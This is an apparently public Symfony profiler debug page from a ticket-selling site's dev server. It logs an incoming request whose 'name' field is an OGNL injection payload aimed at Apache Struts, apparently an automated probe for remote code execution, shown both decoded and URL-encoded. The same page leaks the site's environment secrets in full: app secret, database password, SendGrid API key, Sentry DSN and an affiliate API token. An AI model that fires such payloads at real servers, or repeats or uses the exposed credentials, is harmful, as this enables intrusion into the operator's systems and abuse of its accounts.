VisitController :: index
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| __checkbox_bustedBefore | "true" |
| age | "10" |
| description | "\r\n" |
| name | "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44786*40168)).(#q)}" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _controller | "App\Controller\VisitController::index" |
| _firewall_context | "security.firewall.map.context.main" |
| _remove_csp_headers | true |
| _route | "app_visit" |
| _route_params | [ "slug" => "integration" "redirectPath" => "saveGangster.action" ] |
| _security_firewall_run | "_security_main" |
| _stopwatch_token | "e1e14d" |
| redirectPath | "saveGangster.action" |
| slug | "integration" |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip" |
| accept-language | "en" |
| connection | "close" |
| content-length | "1191" |
| content-type | "application/x-www-form-urlencoded" |
| host | "amb-dev.clubtickets.com" |
| user-agent | "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" |
| x-php-ob-level | "1" |
Request Content
Raw
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%2844786%2a40168%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Fri, 12 Dec 2025 10:50:21 GMT" |
| x-debug-exception | "Invalid%20Slug" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fhtml%2Fdev_ambassadors%2Fvendor%2Fsymfony%2Fframework-bundle%2FController%2FAbstractController.php:340" |
| x-debug-token | "56544e" |
| x-debug-token-link | "https://amb-dev.clubtickets.com/_profiler/6b3e10" |
| x-previous-debug-token | "6b3e10" |
| x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session 1
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
1
Usages
Stateless check enabled
| Usage |
|---|
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:44
[
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
"line" => 44
"function" => "getMetadataBag"
"class" => "Symfony\Component\HttpFoundation\Session\Session"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-http/Firewall/AccessListener.php"
"line" => 87
"function" => "getToken"
"class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
"line" => 49
"function" => "authenticate"
"class" => "Symfony\Component\Security\Http\Firewall\AccessListener"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-http/Firewall/AbstractListener.php"
"line" => 26
"function" => "authenticate"
"class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
"line" => 60
"function" => "__invoke"
"class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
"line" => 70
"function" => "__invoke"
"class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/security-http/Firewall.php"
"line" => 92
"function" => "callListeners"
"class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
"line" => 117
"function" => "onKernelRequest"
"class" => "Symfony\Component\Security\Http\Firewall"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/event-dispatcher/EventDispatcher.php"
"line" => 230
"function" => "__invoke"
"class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/event-dispatcher/EventDispatcher.php"
"line" => 59
"function" => "callListeners"
"class" => "Symfony\Component\EventDispatcher\EventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
"line" => 154
"function" => "dispatch"
"class" => "Symfony\Component\EventDispatcher\EventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/http-kernel/HttpKernel.php"
"line" => 139
"function" => "dispatch"
"class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/http-kernel/HttpKernel.php"
"line" => 75
"function" => "handleRaw"
"class" => "Symfony\Component\HttpKernel\HttpKernel"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/http-kernel/Kernel.php"
"line" => 202
"function" => "handle"
"class" => "Symfony\Component\HttpKernel\HttpKernel"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
"line" => 35
"function" => "handle"
"class" => "Symfony\Component\HttpKernel\Kernel"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/vendor/autoload_runtime.php"
"line" => 35
"function" => "run"
"class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
"type" => "->"
]
[
"file" => "/var/www/html/dev_ambassadors/public/index.php"
"line" => 5
"args" => [
"/var/www/html/dev_ambassadors/vendor/autoload_runtime.php"
]
"function" => "require_once"
]
]
|
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ADDRESS | "https://amb.clubtickets.com" |
| APP_ENV | "dev" |
| APP_SECRET | "58efff949f41a55cea11424cd299bb9c" |
| CLUBTICKETS_API_BASE | "https://admin.clubtickets.com/api/affiliate/dcb60d8f08f80ecd6a60eb8e868b6f3c" |
| DATABASE_URL | "mysql://amb:amb$$33@127.0.0.1:3306/dev_ambassadors?serverVersion=8&charset=utf8mb4" |
| MAILER_DSN | "sendgrid://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@default" |
| REDIRECT_BASE | "https://www.clubtickets.com" |
| SENTRY_DSN | "https://f7ee80bfe2b240efab90c7a258db1558@o70568.ingest.sentry.io/4504775561248769" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "1191" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| DOCUMENT_ROOT | "/var/www/html/dev_ambassadors/public" |
| DOCUMENT_URI | "/index.php" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_ACCEPT_LANGUAGE | "en" |
| HTTP_CONNECTION | "close" |
| HTTP_CONTENT_LENGTH | "1191" |
| HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
| HTTP_HOST | "amb-dev.clubtickets.com" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REDIRECT_STATUS | "200" |
| REMOTE_ADDR | "148.224.24.53" |
| REMOTE_PORT | "20495" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1765536620 |
| REQUEST_TIME_FLOAT | 1765536620.8454 |
| REQUEST_URI | "/integration/saveGangster.action" |
| SCRIPT_FILENAME | "/var/www/html/dev_ambassadors/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "146.59.195.19" |
| SERVER_NAME | "amb-dev.clubtickets.com" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SOFTWARE | "nginx/1.18.0" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,SENTRY_DSN,MAILER_DSN,REDIRECT_BASE,CLUBTICKETS_API_BASE,APP_ADDRESS" |
| USER | "www-data" |